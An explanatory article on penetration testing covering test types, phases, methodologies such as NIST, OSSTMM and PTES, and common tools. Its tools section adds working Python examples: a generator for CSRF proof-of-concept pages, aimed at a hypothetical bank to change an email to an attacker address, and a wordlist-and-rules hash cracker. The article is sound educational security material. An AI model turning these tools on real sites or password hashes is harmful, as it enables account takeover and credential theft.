Penetration tests are simulated cyber attacks executed by white hat hackers on systems and networks. The goal of these simulations is to detect vulnerabilities, misconfigurations, errors, and other weaknesses that real attackers could exploit.
Pentesters work closely with the organization whose security posture they are hired to improve. There are different types of penetration tests, methodologies and best practices that need to be followed for optimal results, and we’ll cover those here.
Different Methods and Types of Penetration Testing
When a company hires a penetration testing service, it will typically be offered three different types of simulations. Known as black, white, and gray box pentests, these differ in how much information is provided to the pentester before running the simulated attacks. Additionally, tests can be comprehensive or limited. Limited tests can focus on narrower targets such as networks, Internet of Things (IoT) devices, physical security, cloud security, web applications, or other system components.
White box pentest
In white box penetration testing, organizations give white hat hackers, sometimes called ethical hackers, full information on the systems in scope: architecture documentation, source code, user and administrative credentials, and other critical internal data. This lets the testers simulate an insider, or an external attacker who has already obtained a foothold, and spend their time on depth rather than discovery. Because little effort goes into reconnaissance, white box tests are usually cheaper and faster than black box tests.
Black box pentest
These are the most time-consuming and costly penetration tests, but also the most realistic, because they come closest to the steps a real external attacker goes through. In black box tests, also known as blind tests, the testers receive no information beyond the agreed scope and rules of engagement. They must start by mapping the target's external footprint to find entry points and work out where critical business assets are located.
Gray box pentest
In gray box tests, also known as translucent tests, the organization gives the pentesters partial information but not full disclosure of the architecture. Typically this is a standard user's credentials, or some knowledge of internal networks or applications, which simulates an attacker who has already compromised an account or a low-privileged employee.
Red and blue teams
In all three types of pentests, the penetration testers act as the red team and the organization's security team as the blue team. The exercise can be announced, with the blue team told in advance about the nature of the simulation, or unannounced, so that the blue team's detection and response are measured under realistic conditions. Either way, the red-blue format lets security teams see what actual attacks look like in their own telemetry and measure their response time and performance.
Red and blue team exercises can go beyond individual pentests to include comprehensive, ongoing testing objectives. Their communications can also be facilitated by a third team, called a purple team, for optimal effectiveness.
Also read: Red Team vs Blue Team vs Purple Team: Differences Explained
Comprehensive and limited pentests
Finally, tests can be comprehensive, covering an organization's entire network, systems, and endpoints, or limited to specific infrastructure components. Comprehensive tests are rare, expensive, and hard to execute.
Because organizations usually run a penetration testing program that schedules tests periodically, individual tests tend to be limited to one or a few components. Limited tests allow for a deeper dive into a particular environment, are the natural choice when an application is updated or newly deployed, and are more focused, cheaper, and faster to run.
Depending on what limited tests focus on, they can be:
- Network pentests
- Wireless pentests
- Physical pentests
- Social engineering pentests
- Client-side pentests
- IoT pentests
- Mobile pentests
- Web pentests
- Cloud pentests
- Edge computing pentests
Also read: Penetration Testing vs. Vulnerability Testing: An Important Difference
Starting a Pentesting Program
Most organizations hire outside help to conduct pentesting, but those with larger security teams could start their own internal program, with the added benefit that they may be able to carry out a more comprehensive program as a result.
Either way, it’s best to design your pentesting program internally so that you ensure your goals are met and the most critical assets protected.
For more on pentesting program design and assembling a team, read How to Implement a Penetration Testing Program in 10 Steps.
7 Steps of Penetration Testing
Companies hiring penetration testing services should also familiarize themselves with the seven phases of a test. The testers must have intimate knowledge of all of them, including the first and last phases, which are often neglected.
The phases of a penetration test are:
- Pre-engagement (scoping, rules of engagement, and written authorization)
- Reconnaissance or open-source intelligence (OSINT) gathering
- Scanning or discovery
- Vulnerability assessment
- Exploitation (gaining access, then maintaining it)
- Post-exploitation, reporting, and risk analysis
- Remediation and re-testing
Further reading: Penetration Testing Phases & Steps Explained
The Five Different Penetration Testing Methodologies
Leading security organizations have developed five penetration testing methodologies that serve as a blueprint for testing environments. These include:
- Open Web Application Security Project (OWASP) testing guides
- National Institute of Standards and Technology (NIST)
- Open-Source Security Testing Methodology Manual (OSSTMM)
- Information System Security Assessment Framework (ISSAF)
- Penetration Testing Execution Standard (PTES)
These methodologies provide clear direction on how pentests are conducted. Methodologies are exhaustive, detailed, and developed for different businesses and organizations. For example, some methods meet national security and federal standards, while others are focused on private companies.
Also read: What Is a Pentest Framework? Top 7 Frameworks Explained
NIST
Developed by NIST, an agency of the United States Department of Commerce, NIST Special Publication 800-115, Technical Guide to Information Security Testing and Assessment, is the most prescriptive of the methodologies from start to finish. Companies that want to meet high security standards adopt it for penetration testing. NIST guidance is required reading for U.S. federal agencies and their contractors, and many regulated private organizations adopt it as well.
OSSTMM
Developed by the Institute for Security and Open Methodologies (ISECOM), the Open Source Security Testing Methodology Manual (OSSTMM) is one of the most widely used pentest methodologies. It is specific enough to be actionable while letting white hat hackers tailor tests to an organization's particular demands. OSSTMM is peer-reviewed and takes a measurement-driven approach: results are expressed as operational security metrics rather than a simple pass or fail.
The current version, OSSTMM 3, organizes testing into five channels, each with its own test modules:
- Human security: personnel awareness, fraud, and social engineering
- Physical security: access controls, perimeters, and physical locations
- Wireless security: Wi-Fi, Bluetooth, mobile devices, and other radio and electromagnetic channels
- Telecommunications security: telephony, PBX, and VoIP infrastructure
- Data networks security: computer networks, their data controls, and the security processes around them
ISSAF
The Information Systems Security Assessment Framework (ISSAF), created by the Open Information Systems Security Group (OISSG), is the go-to methodology for pentesters who need to use a lot of tools and must run fully customized penetration tests. The downside of ISSAF is that it is no longer updated, and keeping up to date is critical in an ever-evolving threat landscape. Despite this, testers still turn to ISSAF because it ties each step of the pentest process to specific tools. Like all the methodologies here, it covers every stage from pre-engagement to reporting.
ISSAF phases include:
- Information gathering
- Network mapping
- Vulnerability identification
- Penetration
- Gaining access and privilege escalation
- Enumerating further
- Compromising remote users and sites
- Maintaining access
- Covering the tracks
OWASP
OWASP publishes testing guides rather than a single methodology: the Web Security Testing Guide (WSTG) for web applications and APIs, the Mobile Application Security Testing Guide (MASTG) for mobile apps, and an IoT security testing guide. They are written for penetration testers but are equally used by developers during the early stages of application development, and they are actively maintained, which helps the security community keep up with new technologies.
The WSTG organizes its individual test cases, each with its own identifier and test procedure, into the following categories:
- Information gathering
- Configuration and deployment management testing
- Identity management testing
- Authentication testing
- Authorization testing
- Session management testing
- Input validation testing (injection, cross-site scripting, and related flaws)
- Error handling
- Weak cryptography
- Business logic testing
- Client-side testing
- API testing
PTES
The PTES framework offers guidance on all stages of a pentest. Its seven main sections are pre-engagement interactions, intelligence gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, and reporting.
Because the main standard deliberately stays at the level of process rather than technique, PTES also maintains a separate set of Technical Guidelines that maps tools and procedures onto each section.
PCI DSS
And a bonus: the PCI Security Standards Council publishes its own Penetration Testing Guidance for organizations subject to PCI DSS, which requires internal and external penetration testing at least annually and after significant changes.
Also Read: Network Protection: How to Secure a Network
Pros and Cons of Penetration Testing
Like all security solutions and approaches, penetration tests have benefits, risks, and challenges. The most significant advantage of penetration testing is that it is the only approach that simulates a real, human-driven attack. Automated scanners cannot chain findings together or improvise the way a skilled attacker does, so penetration testers are vital for showing what an attacker could actually do with the weaknesses present.
Penetration testing's other benefits include detecting vulnerabilities, errors, and misconfigurations. Tests are also flexible and can be customized, allowing organizations to exercise specific scenarios and adapt to new threats as they appear in the wild. A test can also reveal the real consequences an error or misconfiguration would have, rather than just its presence.
Automated tools are good at detecting known issues, but they typically do not show what would happen if an attacker exploited a vulnerability. Expert pentesters will also provide remediation recommendations, so organizations learn not only where their weak points are, but also how to fix them and take action.
On the other hand, penetration tests also have drawbacks. Even with free tools, pentesting involves the expense of hiring security professionals or consultants. Those professionals need to clean up when they are done, removing any backdoors, accounts, or other artifacts they installed to gain a foothold in the network. And the reporting has to be good enough that the flaws they find actually get fixed.
The value of a test depends on the penetration testers and the skills they bring to the table. Another challenge is getting buy-in: while penetration testing as a concept dates back to the 1970s, many organizations are still reluctant to let anyone run attacks against their systems.
A weak security culture and limited awareness of how pentesting has evolved, and how effective it can be, hold back many decision-makers. Trusting a penetration tester with production systems, sensitive data, and business-critical assets can also be a roadblock, precisely because pentesters simulate real attacks.
Top Pentesting Tools
There are numerous penetration test tools in the market; some are free to use, while others are commercial solutions. Some of the most popular and effective solutions pentesters use include Kali Linux, Burp Suite, Wireshark, and John the Ripper. And while not listed below, other popular penetration testing tools include Hashcat, Nmap, and Invicti.
Kali Linux
Kali Linux is a Debian-based open-source Linux distribution maintained by OffSec (formerly Offensive Security) and built for penetration testing, digital forensics, and related work. It ships with roughly 600 open-source security tools preinstalled, including the following:
- Nmap: Port scanner with service and version detection
- Wireshark: Packet capture and protocol analyzer
- Metasploit Framework: Penetration testing framework with thousands of exploit and auxiliary modules
- John the Ripper: Password cracker
- sqlmap: Automated SQL injection detection and database takeover
- Aircrack-ng: Wireless LAN (802.11) auditing suite
- OWASP ZAP: Web application security scanner
- Burp Suite Community Edition: Web application security testing
Burp Suite
Burp Suite is a suite of web application security testing tools developed by PortSwigger, with a free Community Edition and paid Professional and Enterprise licenses. At its core is Burp Proxy, an intercepting proxy placed between the tester's browser and the web server, which gives the tester a man-in-the-middle (MitM) position over their own traffic: every request and response can be inspected, paused, and modified before it is forwarded. This is how pentesters probe web applications for exploitable vulnerabilities and data leaks.
With Burp Suite features, users can:
- Test clickjacking attacks
- Assess token strength
- Do deep manual tests
- Record results of automated attacks to adjust future attacks
- Execute fast brute-forcing and fuzzing with custom sequences of HTTP requests containing multiple payload sets
- Construct cross-site request forgery (CSRF) exploits, generate HTML exploits, and demonstrate CSRF attacks
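The last item above, generating a CSRF proof of concept from a captured request, is simple enough to show end to end. The following added example (written for this article, not PortSwigger's code) parses a raw request as it would appear in the proxy history, checks for the signs that a plain form replay will fail, and renders the auto-submitting page. The captured request is constructed and the host bank.example is hypothetical.

```python
"""Build a CSRF proof-of-concept page from a captured request.

Added example for this article, not PortSwigger's code. The captured request is
constructed for the example and the host bank.example is hypothetical.
"""
import html
from typing import Dict, List
from urllib.parse import parse_qsl

# Constructed request as it would appear in Burp Proxy's HTTP history (hypothetical host).
CAPTURED_REQUEST = (
    "POST /account/email HTTP/1.1\r\n"
    "Host: bank.example\r\n"
    "Cookie: session=abc123\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 36\r\n"
    "\r\n"
    "email=attacker%40evil.example&save=1"
)


def parse_request(raw: str) -> Dict:
    """Split a raw HTTP/1.x request into method, path, lower-cased headers, and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method.upper(), "path": path, "headers": headers, "body": body}


def csrf_defences_seen(req: Dict) -> List[str]:
    """Signs that a plain form replay will fail; absence of all of them is not proof of CSRF."""
    reasons = []
    if any(t in req["body"].lower() for t in ("csrf", "xsrf", "_token", "authenticity_token")):
        reasons.append("body carries a token-looking parameter")
    if any(h.startswith(("x-csrf", "x-xsrf", "x-requested-with")) for h in req["headers"]):
        reasons.append("custom header present; an HTML form cannot send it cross-site")
    if req["headers"].get("content-type", "").startswith("application/json"):
        reasons.append("JSON body cannot be produced by a form post")
    return reasons


def build_csrf_poc(req: Dict, scheme: str = "https") -> str:
    """Render an HTML page that re-issues the request from the victim's browser.

    Only GET and form-encoded POST are reproducible this way. The browser attaches the
    victim's cookies automatically unless SameSite (Lax is the browser default) blocks
    them, which is the check a tester makes alongside this PoC.
    """
    content_type = req["headers"].get("content-type", "")
    if req["method"] not in ("GET", "POST"):
        raise ValueError(f"cannot reproduce method {req['method']} with a form")
    if req["method"] == "POST" and not content_type.startswith("application/x-www-form-urlencoded"):
        raise ValueError(f"cannot reproduce content type {content_type!r} with a form")
    path, _, query = req["path"].partition("?")
    params = parse_qsl(req["body"] if req["method"] == "POST" else query, keep_blank_values=True)
    action = html.escape(f"{scheme}://{req['headers']['host']}{path}", quote=True)
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(k, quote=True)}" value="{html.escape(v, quote=True)}">'
        for k, v in params
    )
    method = req["method"]
    return (
        "<html><body>\n"
        f'  <form id="poc" action="{action}" method="{method}">\n'
        f"{inputs}\n"
        "  </form>\n"
        '  <script>document.getElementById("poc").submit();</script>\n'
        "</body></html>\n"
    )


if __name__ == "__main__":
    request = parse_request(CAPTURED_REQUEST)
    print(csrf_defences_seen(request) or build_csrf_poc(request))
```

The escaping matters even in a proof of concept: parameter values come from the captured request, and an unescaped quote would break out of the attribute and turn the PoC page into something other than what the report claims.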
Also read: Getting Started with the Burp Suite: A Pentesting Tutorial
Wireshark
Wireshark is an open-source network protocol analyzer, developed on GitLab with a mirror on GitHub, that captures live traffic or loads saved capture files and decodes each packet layer by layer. It handles many link types, including Ethernet, Wi-Fi, loopback, and legacy technologies such as token ring and asynchronous transfer mode (ATM).
Other features include:
- Dissectors for hundreds of protocols, presenting each packet as a tree of decoded fields
- Capture filters and display filters to narrow traffic to what matters, such as one host or one protocol
- Follow Stream views that reassemble a TCP, UDP, or TLS conversation as the endpoints saw it
- Decryption of protocols such as TLS when the session keys are supplied, for instance via a browser's SSLKEYLOGFILE
- Export of packets, objects, and statistics, plus tshark, the command-line version for scripting
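What "decodes each packet layer by layer" means in practice is worth seeing once without the GUI. The following added example (written for this article, not Wireshark code) builds a one-packet classic pcap file in memory and then parses it the way a dissector does: pcap record header, Ethernet, IPv4, TCP, payload. The capture, addresses, ports and HTTP payload are all constructed; no capture privileges are needed.

```python
"""Minimal pcap dissector: the Ethernet -> IPv4 -> TCP peeling done for every frame.

Added example for this article, not Wireshark's code. The capture is built in memory
so the example runs offline; addresses, ports, and payload are constructed.
"""
import struct
from dataclasses import dataclass
from typing import List, Optional

PCAP_MAGIC = 0xA1B2C3D4        # classic libpcap magic, microsecond timestamps
LINKTYPE_ETHERNET = 1
ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6
TCP_FLAGS = [(0x01, "FIN"), (0x02, "SYN"), (0x04, "RST"), (0x08, "PSH"), (0x10, "ACK"), (0x20, "URG")]


@dataclass
class Packet:
    ts: float
    src: str
    sport: int
    dst: str
    dport: int
    flags: int
    payload: bytes


def tcp_flag_names(flags: int) -> List[str]:
    return [name for bit, name in TCP_FLAGS if flags & bit]


def build_sample_pcap() -> bytes:
    """Constructed capture: 10.0.0.5:51234 -> 198.51.100.10:80, PSH/ACK, 'GET / HTTP/1.1'."""
    payload = b"GET / HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
    # TCP: ports, seq, ack, data offset (5 words), flags PSH|ACK, window, checksum (0), urgent
    tcp = struct.pack("!HHIIBBHHH", 51234, 80, 1000, 2000, 5 << 4, 0x18, 65535, 0, 0)
    total_len = 20 + len(tcp) + len(payload)
    # IPv4: ver/ihl, tos, total length, id, flags/frag, ttl, proto, checksum (0), src, dst
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 1, 0, 64, IPPROTO_TCP, 0,
                     bytes([10, 0, 0, 5]), bytes([198, 51, 100, 10]))
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + struct.pack("!H", ETHERTYPE_IPV4)
    frame = eth + ip + tcp + payload
    global_hdr = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    record_hdr = struct.pack("<IIII", 1_700_000_000, 123456, len(frame), len(frame))
    return global_hdr + record_hdr + frame


def dissect_frame(frame: bytes, ts: float) -> Optional[Packet]:
    """Return a Packet for Ethernet/IPv4/TCP frames; None for ARP, IPv6, UDP, etc."""
    if len(frame) < 34 or struct.unpack_from("!H", frame, 12)[0] != ETHERTYPE_IPV4:
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4                   # IPv4 header length in bytes (>20 means options)
    total_len = struct.unpack_from("!H", ip, 2)[0]
    if ip[9] != IPPROTO_TCP:
        return None
    src = ".".join(map(str, ip[12:16]))
    dst = ".".join(map(str, ip[16:20]))
    tcp = ip[ihl:total_len]                    # trust the IP length, not the frame: Ethernet pads short frames
    sport, dport = struct.unpack_from("!HH", tcp, 0)
    data_off = (tcp[12] >> 4) * 4              # TCP header length in bytes (options after 20)
    return Packet(ts, src, sport, dst, dport, tcp[13], bytes(tcp[data_off:]))


def parse_pcap(data: bytes) -> List[Packet]:
    """Walk the global header and each record header, dissecting every frame."""
    magic = struct.unpack_from("<I", data, 0)[0]
    if magic == PCAP_MAGIC:
        endian = "<"
    elif magic == 0xD4C3B2A1:                  # same magic written big-endian
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is a different format)")
    linktype = struct.unpack_from(endian + "I", data, 20)[0]
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError(f"unsupported link type {linktype}")
    packets, off = [], 24
    while off + 16 <= len(data):
        ts_sec, ts_usec, incl_len, _orig_len = struct.unpack_from(endian + "IIII", data, off)
        off += 16
        pkt = dissect_frame(data[off:off + incl_len], ts_sec + ts_usec / 1e6)
        off += incl_len
        if pkt:
            packets.append(pkt)
    return packets


if __name__ == "__main__":
    for p in parse_pcap(build_sample_pcap()):
        print(f"{p.src}:{p.sport} -> {p.dst}:{p.dport} [{'/'.join(tcp_flag_names(p.flags))}] {p.payload[:16]!r}")
```

Two details are the kind of thing Wireshark gets right and hand-written parsers get wrong: header lengths are read from the IHL and data-offset fields rather than assumed to be 20 bytes, and the TCP segment is cut at the IP total length rather than the frame length, because Ethernet pads short frames with trailing bytes that are not payload.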
John the Ripper
John the Ripper is a free, open-source password cracker available for many flavors of Unix, macOS, Windows, DOS, BeOS, and OpenVMS.
It is highly customizable, with features including:
- Auto-detection of password hash types
- Support out of the box for Unix crypt(3) hashes (DES-, MD5-, and Blowfish/bcrypt-based), Kerberos AFS hashes, and Windows LAN Manager (LM) hashes
- Hundreds of additional formats in the community-enhanced "jumbo" build, including MD4-based Windows NT hashes and hashes stored in databases and directory systems such as MySQL and LDAP
- Wordlist, rule-based, and incremental (brute-force) cracking modes
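The two features that do most of the work in a real engagement are the hash-type auto-detection and the wordlist mode with mangling rules. The following added example (written for this article, not John the Ripper's code) shows both in miniature: formats are guessed from the hash's shape, and a short dictionary is expanded with case, suffix and leetspeak rules against a set of hashes computed here from constructed passwords. The user names, passwords and the four-word "wordlist" are all made up for the example.

```python
"""Hash format auto-detection and a wordlist-plus-rules attack, in the spirit of
John the Ripper's wordlist mode.

Added example for this article, not John the Ripper's code. Target hashes are
computed here from constructed passwords; the wordlist is a short inline list.
"""
import hashlib
from typing import Dict, Iterable, Optional

# Raw (unsalted) hex digests are told apart by length, as John does when guessing a format.
RAW_FORMATS = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}


def detect_format(h: str) -> Optional[str]:
    """Guess the hash format from its shape; None when unrecognised."""
    if h.startswith(("$2a$", "$2b$", "$2y$")):
        return "bcrypt"
    if h.startswith("$6$"):
        return "sha512crypt"
    if h.startswith("$1$"):
        return "md5crypt"
    if h and all(c in "0123456789abcdef" for c in h.lower()):
        return RAW_FORMATS.get(len(h))
    return None


def mangle(word: str) -> Iterable[str]:
    """Rules like John's default wordlist rules: case changes, common suffixes, leetspeak."""
    leet = str.maketrans("aeios", "43105")
    for w in (word, word.lower(), word.capitalize(), word.upper()):
        yield w
        yield w.translate(leet)
        for suffix in ("1", "123", "!", "2024", "!1"):
            yield w + suffix
            yield w.translate(leet) + suffix


def crack(hashes: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, Optional[str]]:
    """Map each user to the recovered password, or None.

    Unsalted hashes are attacked in a single pass: each candidate is hashed once per
    format and looked up against every target at once, which is why unsalted storage
    lets a whole user base fall together. Salted, slow formats (bcrypt, sha512crypt)
    are detected but skipped here; John attacks them too, one salt at a time, far slower.
    """
    by_format: Dict[str, Dict[str, str]] = {}
    for user, h in hashes.items():
        fmt = detect_format(h)
        if fmt in RAW_FORMATS.values():
            by_format.setdefault(fmt, {})[h.lower()] = user
    found: Dict[str, Optional[str]] = {u: None for u in hashes}
    for word in wordlist:
        for cand in mangle(word):
            for fmt, targets in by_format.items():
                user = targets.get(hashlib.new(fmt, cand.encode()).hexdigest())
                if user is not None and found[user] is None:
                    found[user] = cand
    return found


def sample_hashes() -> Dict[str, str]:
    """Constructed user/hash pairs (made-up passwords, not real accounts)."""
    return {
        "alice": hashlib.md5(b"Summer2024").hexdigest(),       # capitalise + year suffix rule
        "bob": hashlib.sha1(b"p455w0rd!").hexdigest(),          # leetspeak + suffix rule
        "carol": hashlib.sha256(b"Tr0ub4dor&3").hexdigest(),    # not derivable from this list
        "dave": "$2b$12$" + "x" * 53,                           # bcrypt placeholder: detected, skipped
    }


WORDLIST = ["summer", "password", "letmein", "welcome"]   # constructed mini dictionary

if __name__ == "__main__":
    for user, pw in crack(sample_hashes(), WORDLIST).items():
        print(f"{user}: {pw if pw else '(not cracked)'}")
```

The finding a tester writes up from a run like this is rarely "the hash was cracked"; it is that the application stores unsalted fast hashes, or that the password policy permits dictionary words with a year appended, both of which the report should pair with a remediation (bcrypt or Argon2 with per-user salts, and a breached-password check at enrolment).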
For more on the wide array of available pentesting tools, see the Best Penetration Testing Tools and the Top Open Source Penetration Testing Tools.
What to Do After a Penetration Test
Penetration tests do not end after white hat hackers detect vulnerabilities. Reporting and remediation are vital components that should never be left out. Top pentest vendors offer complete reports that provide a 360-degree view into the errors, the consequences, and recommendations to fix and patch security flaws.
Reporting serves security teams, IT, developers, staff, and top decision-makers alike, and its purpose is to improve how the whole organization operates. The main goal of a penetration test is not simply to detect weaknesses but to improve security, efficiency, and risk prevention.
In addition, a good practice for penetration testers and organizations is to restore systems to the original state in which they were before an attack. If pentesters modify configurations and settings, install software, or make any other alterations to the system, they must clean and restore it.
Additionally, companies running penetration tests should execute them within their pentest program and chosen frameworks. After remediation, the organization should verify the fixes, ideally with a re-test of the affected findings, monitor the patched systems, and prepare for the next scheduled test. Penetration testing is not a one-and-done process; it is continual work.
For more on finding and fixing vulnerabilities, see:
- Top Vulnerability Management Tools
- Best Patch Management Software & Tools
- Vulnerability Management as a Service (VMaaS): Ultimate Guide
Bottom Line: Penetration Testing
Penetration testing is a critically important cybersecurity practice that can find security holes before hackers do. Along with threat hunting, it’s a practice that can’t be done by tools alone; it requires a human element. And those people need to be trained and prepared to do the job right. It’s not an easy undertaking, but it’s one that every organization should do to the best extent possible.
To see pentest tools in action, read Testing & Evaluating SIEM Systems: A Review of Rapid7 InsightIDR.